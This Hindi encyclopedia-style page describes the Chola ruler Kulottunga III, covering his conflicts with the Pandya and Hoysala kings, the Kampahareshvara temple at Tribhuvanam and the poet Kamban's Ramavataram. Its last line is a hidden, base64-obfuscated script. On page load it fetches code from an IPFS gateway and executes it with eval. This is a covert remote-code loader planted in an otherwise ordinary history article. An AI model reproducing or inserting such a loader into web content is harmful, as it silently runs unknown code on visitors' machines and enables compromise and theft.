कुलोत्तुंग तृतीय

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

कुलोत्तुंग तृतीय (1205-1218 ई.) चोल राजवंश के शासकों में से एक था। इसके शासनकाल में चोल साम्राज्य के वैभव का अपकर्ष हो रहा था।

  • कुलोत्तुंग तृतीय चोल राज्य के वैभव के अपकर्षकाल का शासक था।[1]
  • पहले तो कुलोत्तुंग तृतीय ने पांड्य नरेश जटावर्मन कुलेश्वर को बुरी तरह पराजित किया। बाद में उसने होयसल नरेश वल्लाल द्वितीय की सहायता से अपने राज्य पर अधिकार प्राप्त किया; किंतु उसे पांड्य नरेश की अधीनता स्वीकार करनी पड़ी।
  • उसकी ख्याति कुम्भकोणम के निकट त्रिभुवनम में 'कंपहरेश्वर का मंदिर' बनवाने के लिए हैं।
  • कुलोत्तुंग तृतीय के दरबार में रहने वाले कवि कंबन का काल तमिल साहित्य का स्वर्ण काल माना जाता है। कुलोत्तुंग के ही शासन काल में कंबन ने 'रामावतारम्‌'[2] की रचना की थी।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. कुलोत्तुंग तृतीय (हिन्दी)। । अभिगमन तिथि: 22 मार्च, 2014।
  2. तमिल रामायण

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>